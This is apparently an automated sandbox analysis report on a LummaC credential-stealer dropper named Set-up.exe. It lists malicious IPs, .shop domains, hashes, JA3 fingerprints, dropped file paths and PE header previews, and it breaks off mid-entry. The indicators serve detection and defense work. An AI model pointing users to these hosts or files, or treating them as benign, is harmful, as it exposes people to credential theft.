                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:Set-up.exe
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@59/13@3/3
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 33.3%
                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                                                                      Warnings

                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 52.149.20.212, 13.107.246.45
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • Execution Graph export aborted for target BrightLib.exe, PID 5796 because there are no executed function
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6736 because it is empty
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                      Simulations

                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      12:53:15API Interceptor9x Sleep call for process: Set-up.exe modified
                                                                                                                                                                                      12:54:21API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                      IPs

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      185.161.251.21setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      172.67.208.58Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    cegu.shopsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    klipvumisui.shop'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128
                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.37.128

                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    CLOUDFLARENETUS'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.178.174
                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.163.221
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.21.63
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.90.109
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.196.191
                                                                                                                                                                                                                    momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 1.1.1.1
                                                                                                                                                                                                                    NTLGBsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 82.18.222.135
                                                                                                                                                                                                                    momo.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 82.17.192.171
                                                                                                                                                                                                                    momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 82.128.104.220
                                                                                                                                                                                                                    CLOUDFLARENETUS'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.178.174
                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.163.221
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.21.63
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.90.109
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 172.67.196.191
                                                                                                                                                                                                                    momo.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                    • 1.1.1.1

                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    K27Yg4V48M.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21
                                                                                                                                                                                                                    IH5XqCdf06.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    • 104.21.87.8
                                                                                                                                                                                                                    • 172.67.208.58
                                                                                                                                                                                                                    • 185.161.251.21

                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                    setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                                                            Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:NlllulYl:NllUY
                                                                                                                                                                                                                                                            MD5:AEA455AB1DC4223AE8D0C580ABD57501
                                                                                                                                                                                                                                                            SHA1:E9BCA6B2B40C42F260D129217C64BC1276131E33
                                                                                                                                                                                                                                                            SHA-256:4DA95C096E5D71402A51A01279983A5CE2190966584A9CC28F595955CA6BBA8D
                                                                                                                                                                                                                                                            SHA-512:F48087438F5B08ABF26BDC168BCB70D56FB2B08BB67B5D9CAEF74992EA4EBB734510FF9E828F2CB88DCE2D8861A459457FAC46C6DB40FF952CC3AE43C15E4661
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:@...e...........................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\2a993b7e

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6447207
                                                                                                                                                                                                                                                            Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                            MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                            SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                            SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                            SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exe

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                                                            Size (bytes):8767044
                                                                                                                                                                                                                                                            Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                            MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                            SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                            SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                            SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: #Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvbi4qkq.1bw.psm1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_waf5jreg.cb3.ps1

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                            SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                                            • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: qnUFsmyxMm.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                                                                                                            Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmp
                                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):35616
                                                                                                                                                                                                                                                            Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                            MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                            SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                            SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
